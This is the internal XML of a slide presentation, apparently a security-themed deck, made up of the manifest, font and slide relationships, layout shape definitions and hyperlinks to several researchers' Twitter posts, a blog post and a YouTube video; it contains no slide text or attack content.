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5" r:id="rId4"/>
    <p:sldMasterId id="2147483686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</p:sldIdLst>
  <p:sldSz cy="5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Lato"/>
      <p:regular r:id="rId68"/>
      <p:bold r:id="rId69"/>
      <p:italic r:id="rId70"/>
      <p:boldItalic r:id="rId71"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro"/>
      <p:regular r:id="rId72"/>
      <p:bold r:id="rId73"/>
      <p:italic r:id="rId74"/>
      <p:boldItalic r:id="rId75"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black"/>
      <p:regular r:id="rId76"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald"/>
      <p:regular r:id="rId77"/>
      <p:bold r:id="rId7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73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-bold.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-regular.fntdata"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-boldItalic.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-italic.fntdata"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialBlack-regular.fntdata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78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-bold.fntdata"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-boldItalic.fntdata"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-italic.fntdata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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14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22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide60.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide59.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-regular.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17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font" Target="fonts/Lato-bold.fntdata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ae3d587c06_0_3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ae3d587c06_0_3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afb4e4112c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afb4e4112c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afb4e4112c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afb4e4112c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b88a89362b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b88a89362b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b72cdaefda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b72cdaefda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ae3d587c06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ae3d587c06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ae3d587c06_1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ae3d587c06_1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afb4e4112c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afb4e4112c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afb4e4112c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afb4e4112c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afb4e4112c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afb4e4112c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ae3d587c06_1_1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ae3d587c06_1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afb4e4112c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afb4e4112c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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1_2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ae3d587c06_1_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ae3d587c06_1_8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ae3d587c06_1_8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ae3d587c06_1_8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ae3d587c06_1_8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b72cdaefda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b72cdaefda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ae3d587c06_1_2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ae3d587c06_1_2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ae3d587c06_1_2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ae3d587c06_1_2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ae3d587c06_1_2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Google Shape;552;gae3d587c06_1_2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ae3d587c06_1_2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4" name="Google Shape;564;gae3d587c06_1_2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ae3d587c06_1_2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8" name="Google Shape;578;gae3d587c06_1_2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b88a89362b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b88a89362b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ae3d587c06_1_2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0" name="Google Shape;590;gae3d587c06_1_2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gae3d587c06_1_2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2" name="Google Shape;602;gae3d587c06_1_2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2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gae3d587c06_1_3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4" name="Google Shape;614;gae3d587c06_1_3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gae3d587c06_1_3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6" name="Google Shape;626;gae3d587c06_1_3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ae3d587c06_1_3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" name="Google Shape;638;gae3d587c06_1_3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gae3d587c06_1_3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2" name="Google Shape;652;gae3d587c06_1_3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gae3d587c06_1_3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4" name="Google Shape;664;gae3d587c06_1_3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gae3d587c06_1_3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6" name="Google Shape;676;gae3d587c06_1_3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gae3d587c06_1_3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8" name="Google Shape;688;gae3d587c06_1_3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gae3d587c06_1_4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2" name="Google Shape;702;gae3d587c06_1_4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b7ba56cea6_4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b7ba56cea6_4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ae3d587c06_1_4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" name="Google Shape;722;gae3d587c06_1_4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ae3d587c06_1_4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4" name="Google Shape;734;gae3d587c06_1_4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7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gae3d587c06_1_7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9" name="Google Shape;749;gae3d587c06_1_7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9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gb72cdaefda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1" name="Google Shape;761;gb72cdaefda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gae3d587c06_1_7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3" name="Google Shape;773;gae3d587c06_1_7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2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gae3d587c06_1_7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4" name="Google Shape;784;gae3d587c06_1_7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3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Google Shape;794;gb72cdaefda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5" name="Google Shape;795;gb72cdaefda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5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gb72cdaefda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7" name="Google Shape;807;gb72cdaefda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7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gae3d587c06_1_8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9" name="Google Shape;819;gae3d587c06_1_8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gae3d587c06_1_6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3" name="Google Shape;833;gae3d587c06_1_6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b7ba56cea6_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b7ba56cea6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7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gb72cdaefda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9" name="Google Shape;849;gb72cdaefda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9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gb88a89362b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1" name="Google Shape;861;gb88a89362b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gb72cdaefda_0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3" name="Google Shape;873;gb72cdaefda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3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gb7ba56cea6_4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5" name="Google Shape;885;gb7ba56cea6_4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5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gb7ba56cea6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7" name="Google Shape;897;gb7ba56cea6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6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gb7ba56cea6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8" name="Google Shape;908;gb7ba56cea6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0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gb72cdaefd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2" name="Google Shape;922;gb72cdaefd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2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gb88a89362b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4" name="Google Shape;934;gb88a89362b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0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gb8962b536f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2" name="Google Shape;952;gb8962b536f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8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gae680e5e9d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0" name="Google Shape;970;gae680e5e9d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b7ba56cea6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b7ba56cea6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6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gae680e5e9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8" name="Google Shape;978;gae680e5e9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4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gae3d587c06_0_4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6" name="Google Shape;986;gae3d587c06_0_4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b72cdaefda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b72cdaefda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afb4e4112c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afb4e4112c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b7ba56cea6_4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b7ba56cea6_4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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4226100" y="2933550"/>
            <a:ext cx="691800" cy="388500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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25" y="0"/>
            <a:ext cx="9144000" cy="312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4"/>
          <p:cNvSpPr txBox="1"/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59" name="Google Shape;59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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1567350"/>
            <a:ext cx="9144000" cy="200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5"/>
          <p:cNvSpPr txBox="1"/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3" name="Google Shape;63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" name="Google Shape;65;p16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66" name="Google Shape;66;p16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0" name="Google Shape;70;p17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71" name="Google Shape;71;p17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1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1468825"/>
            <a:ext cx="39999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3" name="Google Shape;73;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4832400" y="1468825"/>
            <a:ext cx="39999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4" name="Google Shape;74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9" name="Google Shape;79;p19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418675" y="145778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80" name="Google Shape;80;p19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1" name="Google Shape;81;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1618204"/>
            <a:ext cx="2808000" cy="295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2" name="Google Shape;82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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490250" y="528900"/>
            <a:ext cx="5678100" cy="408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5" name="Google Shape;85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1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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="175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8" name="Google Shape;88;p21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029675" y="4495500"/>
            <a:ext cx="5772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89" name="Google Shape;89;p21"/>
          <p:cNvSpPr txBox="1"/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0" name="Google Shape;90;p21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1" name="Google Shape;91;p2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95" name="Google Shape;95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7" name="Google Shape;97;p23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413275" y="2988275"/>
            <a:ext cx="9105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98" name="Google Shape;98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9" name="Google Shape;99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0" name="Google Shape;100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obj">
  <p:cSld name="OBJEC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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699007" y="-20954"/>
            <a:ext cx="7746000" cy="6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 b="0" i="0" sz="280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05" name="Google Shape;105;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2880360"/>
            <a:ext cx="6400800" cy="12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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909319" y="-20954"/>
            <a:ext cx="7325400" cy="6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 b="0" i="0" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D9D9D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11" name="Google Shape;111;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1202246"/>
            <a:ext cx="8229600" cy="12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 b="1" i="0" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00FF0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indent="-228600" lvl="1" marL="91440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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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Blank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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7165205" y="5009234"/>
            <a:ext cx="1678800" cy="1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8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17" name="Google Shape;117;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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18" name="Google Shape;118;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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OBJECT_1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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384725" y="503825"/>
            <a:ext cx="8374500" cy="8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 b="0" i="0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21" name="Google Shape;121;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442325" y="1176351"/>
            <a:ext cx="8259300" cy="34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 b="0" i="0" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A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28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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2">
  <p:cSld name="OBJECT_2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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384725" y="503825"/>
            <a:ext cx="8374500" cy="8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 b="0" i="0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27" name="Google Shape;127;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442325" y="1176351"/>
            <a:ext cx="8259300" cy="34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 b="0" i="0" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A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29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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3">
  <p:cSld name="OBJECT_3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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384725" y="503825"/>
            <a:ext cx="8374500" cy="8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 b="0" i="0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33" name="Google Shape;133;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442325" y="1176351"/>
            <a:ext cx="8259300" cy="34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 b="0" i="0" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A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30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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4">
  <p:cSld name="OBJECT_4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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384725" y="503825"/>
            <a:ext cx="8374500" cy="8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 b="0" i="0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39" name="Google Shape;139;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442325" y="1176351"/>
            <a:ext cx="8259300" cy="34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 b="0" i="0" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A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31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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5">
  <p:cSld name="OBJECT_5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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384725" y="503825"/>
            <a:ext cx="8374500" cy="8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 b="0" i="0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45" name="Google Shape;145;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442325" y="1176351"/>
            <a:ext cx="8259300" cy="34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 b="0" i="0" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A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32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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6">
  <p:cSld name="OBJECT_6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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384725" y="503825"/>
            <a:ext cx="8374500" cy="8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 b="0" i="0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51" name="Google Shape;151;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442325" y="1176351"/>
            <a:ext cx="8259300" cy="34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 b="0" i="0" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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7">
  <p:cSld name="OBJECT_7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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384725" y="503825"/>
            <a:ext cx="8374500" cy="8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 b="0" i="0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57" name="Google Shape;157;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442325" y="1176351"/>
            <a:ext cx="8259300" cy="34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 b="0" i="0" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A7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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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8">
  <p:cSld name="OBJECT_8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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1678972" y="720740"/>
            <a:ext cx="5786100" cy="7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 b="0" i="0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63" name="Google Shape;163;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736094" y="822578"/>
            <a:ext cx="7139100" cy="24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 b="0" i="0" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="115F82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indent="-228600" lvl="1" marL="91440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35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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65" name="Google Shape;165;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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66" name="Google Shape;166;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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showMasterSp="0">
  <p:cSld name="Two Content">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="lt1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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4487417" y="390906"/>
            <a:ext cx="169200" cy="87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69" name="Google Shape;169;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="791528"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1055370" w="12192000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="1054799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1054799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EBF0F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70" name="Google Shape;170;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="809028"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000"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noFill/>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="EBF0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71" name="Google Shape;171;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5123853"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000"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noFill/>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="EBF0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72" name="Google Shape;172;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1678972" y="720740"/>
            <a:ext cx="5786100" cy="7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 b="0" i="0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73" name="Google Shape;173;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251022" y="925449"/>
            <a:ext cx="3716100" cy="32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 b="0" i="0" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="115F82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indent="-228600" lvl="1" marL="91440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36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4709160" y="1183005"/>
            <a:ext cx="3977400" cy="33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36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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76" name="Google Shape;176;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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77" name="Google Shape;177;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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9">
  <p:cSld name="OBJECT_9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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1678972" y="720740"/>
            <a:ext cx="5786100" cy="7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 b="0" i="0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80" name="Google Shape;180;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736094" y="822578"/>
            <a:ext cx="7139100" cy="24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 b="0" i="0" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="115F82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indent="-228600" lvl="1" marL="91440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37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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82" name="Google Shape;182;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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83" name="Google Shape;183;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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OBJECT_10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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="526541" y="2795835"/>
            <a:ext cx="8091000" cy="11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 b="1" i="0" sz="4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86" name="Google Shape;186;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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87" name="Google Shape;187;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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88" name="Google Shape;188;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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 Slide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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688847" y="473259"/>
            <a:ext cx="7766400" cy="5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 b="0" i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1" name="Google Shape;191;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2880360"/>
            <a:ext cx="6400800" cy="12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39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr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93" name="Google Shape;193;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt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194" name="Google Shape;194;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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26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36.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme1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odern-writer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1.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/0xAwali" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId7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hyperlink" Target="https://twitter.com/rootpentesting/status/1195367343750307840" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shawarkhan.com/2018/05/getting-read-access-on-edmodo.html" TargetMode="External"/><Relationship Id="rId7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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/adrien_jeanneau/status/1030934842651942912" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/HusseiN98D/status/1325464364569276417" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" 